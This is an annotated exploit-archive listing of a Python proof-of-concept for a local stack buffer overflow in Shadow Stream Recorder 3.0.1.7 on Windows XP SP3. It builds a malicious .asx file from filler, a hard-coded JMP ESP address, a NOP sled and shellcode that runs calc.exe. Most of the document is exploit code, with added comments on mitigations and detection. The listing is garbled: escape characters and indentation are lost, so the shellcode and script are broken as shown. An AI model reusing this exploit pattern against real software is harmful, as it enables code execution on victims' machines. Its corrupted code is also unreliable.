# Title : Shadow Stream Recorder 3.0.1.7 (.asx) Local Buffer Overflow
# Published : 2010-03-30
# Author : b0telh0
#!/usr/bin/python
#
# Title: Shadow Stream Recorder 3.0.1.7 (.asx) Local Buffer Overflow
# Date: 03-29-2010
# Author: b0telh0
# Link: http://www.rm-to-mp3.net/downloads/ssrecordersetup.exe
# Tested on: Windows XP SP3
#
# windows/exec - 228 bytes
# EXITFUNC=seh, CMD=calc.exe
#
# Proof-of-concept generator: builds one long string and writes it to
# 'b0t.asx' in the current directory. The script does not attack anything
# itself; the author's instructions (printed below) are to load the file into
# the recorder manually.
#
# NOTE(review): the literals below read "xda..." and the messages read
# "n[+]..."; the escape prefixes appear to have been lost when the page was
# extracted, so as rendered every value here is plain ASCII text. The
# statements under try:/except: have also lost their indentation, and the
# print statements are Python 2 syntax, so the listing does not parse as shown.
#
# Payload, per the header comment: a 228-byte "windows/exec" stub configured
# with CMD=calc.exe, i.e. launching the calculator as visible proof that
# control of execution was obtained.
shellcode = ("xdaxd6xbexc4x14x6bx17x31xc9xd9x74x24xf4x58xb1"
"x33x83xe8xfcx31x70x14x03x70xd0xf6x9exebx30x7f"
"x60x14xc0xe0xe8xf1xf1x32x8ex72xa3x82xc4xd7x4f"
"x68x88xc3xc4x1cx05xe3x6dxaax73xcax6ex1axbcx80"
"xacx3cx40xdbxe0x9ex79x14xf5xdfxbex49xf5xb2x17"
"x05xa7x22x13x5bx7bx42xf3xd7xc3x3cx76x27xb7xf6"
"x79x78x67x8cx32x60x0cxcaxe2x91xc1x08xdexd8x6e"
"xfax94xdaxa6x32x54xedx86x99x6bxc1x0bxe3xacxe6"
"xf3x96xc6x14x8exa0x1cx66x54x24x81xc0x1fx9ex61"
"xf0xccx79xe1xfexb9x0exadxe2x3cxc2xc5x1fxb5xe5"
"x09x96x8dxc1x8dxf2x56x6bx97x5ex39x94xc7x07xe6"
"x30x83xaaxf3x43xcexa0x02xc1x74x8dx04xd9x76xbe"
"x6cxe8xfdx51xebxf5xd7x15x0dx07xeax83x99xbex9f"
"xe9xc4x40x4ax2dxf0xc2x7fxcex07xdaxf5xcbx4cx5c"
"xe5xa1xddx09x09x15xdex1bx6axf8x4cxc7x43x9fxf4"
"x62x9cx55");
# Filler repeated 26112 times ahead of the 4-byte value below. Presumably this
# is the distance from the start of the parsed field to the saved return
# address in the tested build -- the page gives no derivation, so confirm
# against the vendor's fixed version rather than relying on the number.
junk = "x41" * 26112
# Hard-coded absolute address which the author's comment places in USER32.dll
# on Windows XP SP3. The technique therefore depends on that module loading at
# a fixed base and on the stack being executable; ASLR and DEP are the
# platform mitigations designed to break those two assumptions, and the
# address is specific to the one OS build listed under "Tested on".
eip = "x53x93x37x7E" # 7E379353 USER32.dll (JMP ESP)
# Short run of padding placed between the address and the payload.
nops = "x90" * 20
# Trailing filler appended after the payload; its purpose is not stated on the
# page.
junk2 = "x41" * 3636
try:
# Text-mode write of the concatenated pieces with no ASX markup around them.
# Detection note: a legitimate .asx playlist is a small text document, so a
# file of this size made of one repeated character followed by non-text data
# is a strong anomaly for mail/web gateways and endpoint scanning to flag.
file = open('b0t.asx','w');
file.write(junk+eip+nops+shellcode+junk2);
file.close();
# Operator instructions: the file has to be opened in the application by the
# user (drag and drop), which is why the title classes this as a local issue.
print "n[+] b0t.asx created."
print "[+] Open ssrecorder.exe..."
print "[+] and drag and drop b0t.asx.n"
# Bare except: any failure (not only I/O errors) is reported with the same
# generic message and the underlying exception is discarded.
except:
print "n[-] Error.. Can't write file to system.n"